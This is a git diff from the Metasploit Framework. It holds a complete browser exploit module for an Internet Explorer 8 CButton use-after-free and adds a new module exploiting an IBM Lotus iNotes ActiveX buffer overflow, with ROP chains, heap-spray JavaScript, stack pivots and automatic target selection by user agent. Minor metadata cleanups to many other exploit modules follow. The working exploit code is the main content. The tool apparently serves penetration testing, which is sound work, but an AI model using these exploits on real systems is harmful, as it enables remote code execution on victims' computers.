+ Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "8.0", + :ua_maxver => "8.0", + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :rank => GoodRanking + }) + + def initialize(info={}) + super(update_info(info, + 'Name' => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability", + 'Description' => %q{ + This module exploits a vulnerability found in Microsoft Internet Explorer. A + use-after-free condition occurs when a CButton object is freed, but a reference + is kept and used again during a page reload, an invalid memory that's controllable + is used, and allows arbitrary code execution under the context of the user. + + Please note: This vulnerability has been exploited in the wild targeting + mainly China/Taiwan/and US-based computers. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'eromang', + 'mahmud ab rahman', + 'juan vazquez', #Metasploit + 'sinn3r', #Metasploit + 'Peter Vreugdenhil' #New trigger & new exploit technique + ], + 'References' => + [ + [ 'CVE', '2012-4792' ], + [ 'US-CERT-VU', '154201' ], + [ 'BID', '57070' ], + [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], + [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], + [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], + [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ], + [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ], + [ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ], + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + 'Space' => 1024, + 'DisableNops' => true + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ], + [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ], + [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ], + [ 'IE 8 on Windows 7', { 'Rop' => :jre } ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Dec 27 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '5.2' + os_name = 'Windows Server 2003' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + else + # OS not supported + return nil + end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) + print_status("Target selected as: #{t.name}") + return t + end + end + + return nil + end + + def ie8_smil(my_target, p) + + case my_target['Rop'] + when :msvcrt + case my_target.name + when 'IE 8 on Windows XP SP3' + align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET + xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET + when 'IE 8 on Windows Server 2003' + align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*")) + xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*")) + end + else + align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*")) + xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*")) + end + + padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4)) + js_payload = Rex::Text.to_unescape(p) + + js = %Q| + unicorn = unescape("#{padding}"); + for (i=0; i < 3; i++) { + unicorn += unescape("#{padding}"); + } + + unicorn += unescape("#{js_payload}"); + + animvalues = unescape("#{align_esp}"); + + for (i=0; i < 0xDC/4; i++) { + if (i == 0xDC/4-1) { + animvalues += unescape("#{xchg_esp}"); + } + else { + animvalues += unescape("#{align_esp}"); + } + } + + animvalues += unicorn; + + for(i = 0; i < 21; i++) { + animvalues += ";cyan"; + } + | + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + return js + end + + def junk(n=4) + return rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + + def get_payload(t, cli) + code = payload.encoded + + # No rop. Just return the payload. + return code if t['Rop'].nil? + + case t['Rop'] + when :msvcrt + case t.name + when 'IE 8 on Windows XP SP3' + rop_gadgets = + [ + 0x77c1e844, # POP EBP # RETN [msvcrt.dll] + 0x77c1e844, # skip 4 bytes [msvcrt.dll] + 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll] + 0xffffffff, + 0x77c127e5, # INC EBX # RETN [msvcrt.dll] + 0x77c127e5, # INC EBX # RETN [msvcrt.dll] + 0x77c4e0da, # POP EAX # RETN [msvcrt.dll] + 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) + 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] + 0x77c34fcd, # POP EAX # RETN [msvcrt.dll] + 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) + 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] + 0x77c3048a, # POP EDI # RETN [msvcrt.dll] + 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll] + 0x77c46efb, # POP ESI # RETN [msvcrt.dll] + 0x77c2aacc, # JMP [EAX] [msvcrt.dll] + 0x77c3b860, # POP EAX # RETN [msvcrt.dll] + 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll] + 0x77c12df9, # PUSHAD # RETN [msvcrt.dll] + 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll] + ].pack("V*") + when 'IE 8 on Windows Server 2003' + rop_gadgets = + [ + 0x77bb2563, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bb2563, # POP EAX # RETN + 0x03C0990F, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bb2563, # POP EAX # RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bb2563, # POP EAX # RETN + nop, + 0x77be6591 # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") + end + else + rop_gadgets = + [ + 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN + 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) + 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] + 0x7c3415a2, # JMP [EAX] [msvcr71.dll] + 0xffffffff, + 0x7c376402, # skip 4 bytes [msvcr71.dll] + 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] + 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] + 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] + 0x7c344f87, # POP EDX # RETN [msvcr71.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] + 0x7c34d201, # POP ECX # RETN [msvcr71.dll] + 0x7c38b001, # &Writable location [msvcr71.dll] + 0x7c347f97, # POP EAX # RETN [msvcr71.dll] + 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] + 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] + 0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll] + # rop chain generated with mona.py + ].pack("V*") + end + + rop_payload = rop_gadgets + case t['Rop'] + when :msvcrt + rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + else + rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000 + end + rop_payload << code + rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt + + return rop_payload + end + + def load_exploit_html(my_target, cli) + + p = get_payload(my_target, cli) + js = ie8_smil(my_target, p) + + html = %Q| + + + + + + + + + + + +
+
+
+ + + | + + return html + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + print_status("Requesting: #{uri}") + + my_target = get_target(agent) + # Avoid the attack if no suitable target found + if my_target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + html = load_exploit_html(my_target, cli) + html = html.gsub(/^\t\t/, '') + print_status("Sending HTML...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end + + +=begin +(87c.f40): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400 +eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 +mshtml!CMarkup::OnLoadStatusDone+0x504: +637848c3 ff90dc000000 call dword ptr +0xdb (000000dc)[eax] ds:0023:12120de8=???????? +0:008> k +ChildEBP RetAddr +020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504 +020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47 +020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f +020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12 +020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb +020bfd78 7e418734 mshtml!GlobalWndProc+0x183 +020bfda4 7e418816 USER32!InternalCallWinProc+0x28 +020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150 +020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306 +020bfe7c 01252ec9 USER32!DispatchMessageW+0xf +020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 +020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1 +020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab +020bffec 00000000 kernel32!BaseThreadStart+0x37 + +0:008> r +eax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120 +eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 +mshtml!CMarkup::OnLoadStatusDone+0x504: +637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=???????? +=end diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index aef14ef09c..cb58cedabe 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -62,7 +58,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'hdm', ], - 'Version' => '$Revision$', 'References' => [ # MDAC diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb index fc84b19268..2a880988ae 100644 --- a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb +++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'hdm', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-1016' ], diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index 919576c92b..4cc70f581d 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -45,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'natron' ], - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://support.microsoft.com/kb/182569' ], diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index 889adda256..d4149ea286 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # Metasploit module 'mr_me ' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'EDB', '15668' ], diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb index 0ef2cacf57..beb960d75a 100644 --- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb +++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Alexander Gavrun', # Vulnerability discovery 'Dmitriy Pletnev', # Vulnerability discovery - 'James Fitts', # Metasploit module + 'James Fitts ', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb new file mode 100644 index 0000000000..da2353bda9 --- /dev/null +++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb @@ -0,0 +1,292 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "6.0", + :ua_maxver => "9.0", + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :rank => Rank, + :classid => "{0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C}", + :method => "Attachment_Times" + }) + + + def initialize(info={}) + super(update_info(info, + 'Name' => "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow", + 'Description' => %q{ + This module exploits a buffer overflow vulnerability on the UploadControl + ActiveX. The vulnerability exists in the handling of the "Attachment_Times" + property, due to the insecure usage of the _swscanf. The affected ActiveX is + provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer. + + This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, + using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3. + + In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one + is installed with the iNotes ActiveX. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gaurav Baruah', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-2175'], + [ 'OSVDB', '82755' ], + [ 'BID', '53879' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-132/' ], + [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21596862' ] + ], + 'Payload' => + { + 'Space' => 978, + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + # dwa85W.dll 85.3.3.0 + [ 'Automatic', {} ], + [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77C34FBF } ], # pop esp # ret # msvcrt.dll + [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 8 on Windows Vista', { 'Rop' => :notes, 'Offset' => '0x5f4', 'Ret' => 0x1000f765 } ], # pop eax # ret # dwabho.dll + [ 'IE 8 on Windows 7', { 'Rop' => :notes, 'Offset' => '0x5f4', 'Ret' => 0x1000f765 } ], # pop eax # ret # dwabho.dll + [ 'IE 9 on Windows 7', { 'Rop' => :notes, 'Offset' => '0x5fe', 'Ret' => 0x1000f765 } ] # pop eax # ret # dwabho.dll + ], + 'Privileged' => false, + 'DisclosureDate' => "Jun 01 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) + print_status("Target selected as: #{t.name}") + return t + end + end + + return nil + end + + def ie_heap_spray(my_target, p) + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) + + # Land the payload at 0x0c0c0c0c + case my_target + when targets[7] + # IE 9 on Windows 7 + js = %Q| + function randomblock(blocksize) + { + var theblock = ""; + for (var i = 0; i < blocksize; i++) + { + theblock += Math.floor(Math.random()*90)+10; + } + return theblock; + } + + function tounescape(block) + { + var blocklen = block.length; + var unescapestr = ""; + for (var i = 0; i < blocklen-1; i=i+4) + { + unescapestr += "%u" + block.substring(i,i+4); + } + return unescapestr; + } + + var heap_obj = new heapLib.ie(0x10000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_random_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset_length = #{my_target['Offset']}; + for (var i=0; i < 0x1000; i++) { + var padding = unescape(tounescape(randomblock(0x1000))); + while (padding.length < 0x1000) padding+= padding; + var junk_offset = padding.substring(0, offset_length); + var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); + while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; + sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); + heap_obj.alloc(sprayblock); + } + | + + else + # For IE 6, 7, 8 + js = %Q| + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset = nops.substring(0, #{my_target['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + heap_obj.gc(); + for (var i=1; i < 0x300; i++) { + heap_obj.alloc(block); + } + var overflow = nops.substring(0, 10); + | + + end + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + return js + end + + def get_payload(t, cli) + code = payload.encoded + + # No rop. Just return the payload. + return code if t['Rop'].nil? + + # Both ROP chains generated by mona.py - See corelan.be + case t['Rop'] + when :msvcrt + print_status("Using msvcrt ROP") + rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'}) + else + print_status("Using dwabho.dll ROP") + # gadgets from dwabho.dll, using mona.py + rop_payload = [ + 0x1000f765, # POP EAX # RETN + 0x1001a22c, # ptr to &VirtualAlloc() [IAT dwabho.dll] + 0x10010394, # JMP DWORD PTR DS:[EAX] + 0x0c0c0c2c, # ret after VirtualAlloc + 0x0c0c0c2c, # lpAddress + 0x00000400, # dwSize + 0x00001000, # flAllocationType + 0x00000040 # flProtect + ].pack("V*") + rop_payload << code + end + + return rop_payload + end + + def load_exploit_html(my_target, cli) + p = get_payload(my_target, cli) + js = ie_heap_spray(my_target, p) + + bof = rand_text_alpha(552) # offset to eip + bof << [my_target.ret].pack("V") + + case my_target['Rop'] + when :msvcrt + bof << rand_text_alpha(4) + bof << [0x0c0c0c0c].pack("V") # new ESP + when :notes + bof << rand_text_alpha(4) + bof << [0x0c0c0c00].pack("V") # eax + bof << [0x1000f49a].pack("V") # pop esp # dec ecx # add byte ptr ds:[eax],al # pop ecx # pop ecx # retn # dwabho.dll + bof << [0x0c0c0c04].pack("V") # new ESP + end + + my_bof = Rex::Text.to_unescape(bof) + + html = %Q| + + + + + + + + + + + + + | + + return html + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + print_status("Requesting: #{uri}") + + my_target = get_target(agent) + # Avoid the attack if no suitable target found + if my_target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + html = load_exploit_html(my_target, cli) + html = html.gsub(/^\t\t/, '') + print_status("Sending HTML...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/java_basicservice_impl.rb b/modules/exploits/windows/browser/java_basicservice_impl.rb index 9cf5d3329a..3202d3ca3e 100644 --- a/modules/exploits/windows/browser/java_basicservice_impl.rb +++ b/modules/exploits/windows/browser/java_basicservice_impl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -43,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Matthias Kaiser', # Discovery, PoC, metasploit module 'egypt' # metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3563' ], diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index 37c85a0688..5eb12066b4 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Frederic Hoguin', # Discovery, PoC 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4452' ], diff --git a/modules/exploits/windows/browser/java_docbase_bof.rb b/modules/exploits/windows/browser/java_docbase_bof.rb index c5806c4cb0..0dd7ef6401 100644 --- a/modules/exploits/windows/browser/java_docbase_bof.rb +++ b/modules/exploits/windows/browser/java_docbase_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -49,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'jduck', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3552' ], diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb index da56d1f1f7..05551f796a 100644 --- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb +++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -41,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'jduck', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0886' ], diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index 49030be23c..105bc4dca4 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'jduck', # Bug reported to Oracle by TELUS - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0500' ], diff --git a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb index e8fc8620c3..89ef3ca46b 100644 --- a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb +++ b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'patrick', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2086' ], diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index 123c402041..5445a69191 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5217' ], diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index 6b9fc2a4c0..7a43372ec8 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2918' ], diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb index fd472a09bf..fd28bef942 100644 --- a/modules/exploits/windows/browser/lpviewer_url.rb +++ b/modules/exploits/windows/browser/lpviewer_url.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4384' ], diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb index 0393948d07..a66a68e35f 100644 --- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb +++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5660' ], diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index 7a9d46b7db..c9b4c747fb 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class 